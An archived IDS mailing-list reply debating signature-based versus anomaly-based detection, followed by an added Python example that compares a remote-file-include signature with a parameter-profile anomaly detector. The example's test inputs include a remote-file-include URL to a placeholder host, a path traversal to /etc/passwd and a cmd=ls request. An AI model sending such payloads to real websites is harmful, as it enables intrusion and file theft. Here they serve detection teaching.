IDS mailing list archives
RE: Specification-based Anomaly Detection
From: "Kohlenberg, Toby" <toby.kohlenberg () intel com>
Date: Mon, 10 Jan 2005 22:48:11 -0800
All opinions are my own and in no way reflect the views of my employer. I was going to stay out of this rendition of this debate but...
-----Original Message-----
From: Ofer Shezaf [mailto:Ofer.Shezaf () breach com]
Sent: Sunday, January 09, 2005 3:53 PM
To: Stefano Zanero; roberto.perdisci () gmail com
Cc: focus-ids () lists securityfocus com
Subject: RE: Specification-based Anomaly Detection

Hi Thomas & Stefano,

I agree that anomaly detection is a new-comer to IDS, and in many cases not a mature technology. But I think that due to the inherent shortcomings of signatures, it has to be considered seriously.
What exactly is your definition of "new-comer"? Seeing as anomaly detection has been discussed and studied for at least 15 years as far as I know...
As one of you mentioned, the main disadvantage of signatures is zero day attacks. As I see it, the significance of zero day attacks is way underrated. Zero day attacks usually refer to abusing vulnerabilities before a patch or a signature has been issued, but there are those "perpetual" zero day attacks - the bugs in the software of a specific web site. The recent "phpInclude" worm is a very good example of exploitation of such "perpetual" zero day attacks. The worm itself can be detected by signatures as, being publicly available code, it includes some repeating patterns. On the other hand the same techniques can be (and probably are) used by "non-worm" crawlers or even manually to attack specific sites, and are not detected by signatures.
I'm not sure I follow the argument about "perpetual zero day". It sounds like a problem of poor signature writing. Could you expand a little more on why this is a problem for signature-based approaches as opposed to anomaly-based approaches?
2. On the network layer, network profiling analyzes the normal behavior of users (i.e. traffic), while in the application layer we also profile the normal behavior of the application. Having said that, anomaly itself usually identifies that something is wrong but not what is wrong. We use two important additional mechanisms to derive actionable information:
What is your basis for saying that anomaly detection usually detects that something is wrong? I've never seen an anomaly detection system that detects things that are "wrong", by definition they only detect that something is _different_. The assumption that that is always something wrong is one of the basic problems with how people implement anomaly-based solutions in my opinion.

toby

Toby Kohlenberg, CISSP, GCIH, GCIA
Senior Information Security Analyst
Applied Security Technology Team
Intel Corporate Information Security
503-712-8588 Office & Voicemail
877-497-1696 Pager
"Just because you're paranoid, doesn't mean they're not after you."
PGP Fingerprint: 92E2 E2FC BB8B 98CD 88FA 01A1 6E09 B5BA 9E84 9E70
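The two positions above (a signature catches the published worm string but not a hand-crafted variant; an anomaly model flags anything that differs from the baseline, harmful or not) can be made concrete. The following is an added example written for this archive page, not code from any poster or product. It trains a deliberately simple per-parameter profile (value length and character classes) on a constructed set of normal request lines for a hypothetical PHP site, and pairs it with a constructed signature that only looks for a URL scheme inside a parameter value, the classic remote-file-include shape. The worm-style request, the manual path-traversal variant, a long but legitimate search query, and the hypothetical /admin.php endpoint are all made up for the example; nothing here reproduces the real phpInclude worm or any vendor's rule.

```python
import re
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import parse_qsl, urlsplit

# Constructed training data: request lines of a hypothetical PHP site in normal use.
# These are not real logs and the site does not exist.
TRAINING = [
    "/index.php?page=home",
    "/index.php?page=news",
    "/index.php?page=contact",
    "/index.php?page=about",
    "/view.php?id=17",
    "/view.php?id=2048",
    "/view.php?id=331",
    "/search.php?q=ids+vendors",
    "/search.php?q=anomaly+detection",
    "/search.php?q=snort+rules",
]

# Constructed signature standing in for a worm rule: a URL scheme inside a
# parameter value. It is illustrative only, not any product's real rule.
SIGNATURE = re.compile(r"=\s*(?:https?|ftp)://", re.IGNORECASE)


def signature_alert(url):
    """Signature detection: fires only when the known pattern is present."""
    return SIGNATURE.search(url) is not None


def _char_class(ch):
    # Collapse letters and digits into classes so "512" looks like "17";
    # punctuation stays literal because that is where injection shows up.
    if ch.isdigit():
        return "d"
    if ch.isalpha():
        return "a"
    return ch


class ParamProfile:
    """Per-(path, parameter) baseline of value length and character classes.

    A hypothetical, intentionally simple profile built for this example."""

    def __init__(self):
        self.lengths = defaultdict(list)
        self.classes = defaultdict(set)

    def train(self, urls):
        for url in urls:
            parts = urlsplit(url)
            for name, value in parse_qsl(parts.query, keep_blank_values=True):
                key = (parts.path, name)
                self.lengths[key].append(len(value))
                self.classes[key].update(_char_class(c) for c in value)

    def score(self, url):
        """Return the list of deviations from the baseline (empty = looks normal).

        The model reports only that the request is different, never why it is bad."""
        parts = urlsplit(url)
        reasons = []
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            key = (parts.path, name)
            if key not in self.lengths:
                reasons.append(f"unseen parameter {name} on {parts.path}")
                continue
            seen = self.lengths[key]
            # Never flag a length already observed; otherwise use a 3-sigma bound.
            limit = max(max(seen), mean(seen) + 3 * pstdev(seen))
            if len(value) > limit:
                reasons.append(f"{name}: length {len(value)} > baseline {limit:.1f}")
            novel = {_char_class(c) for c in value} - self.classes[key]
            if novel:
                reasons.append(f"{name}: unseen characters {''.join(sorted(novel))!r}")
        return reasons


PROFILE = ParamProfile()
PROFILE.train(TRAINING)


def analyze(url):
    """Run both detectors on one request line."""
    return {"signature": signature_alert(url), "anomaly": PROFILE.score(url)}


if __name__ == "__main__":
    CASES = [
        ("worm-style RFI", "/index.php?page=http://198.51.100.7/cmd.txt"),
        ("manual variant", "/index.php?page=../../../../etc/passwd"),
        ("benign but new", "/search.php?q=specification+based+anomaly+detection+for+web+applications"),
        ("normal", "/view.php?id=512"),
        ("unknown endpoint", "/admin.php?cmd=ls"),
    ]
    for label, url in CASES:
        print(f"{label:17s} {analyze(url)}")
```

Running the five constructed cases shows the split the thread is arguing about: the signature fires on the worm-style request only, so the manual variant slips past it, while the profile flags the worm, the variant, the unknown endpoint, and the perfectly legitimate long search query alike. The profile cannot tell the last one from the first three; it only knows they are different from what it was trained on, which is exactly the gap between "different" and "wrong".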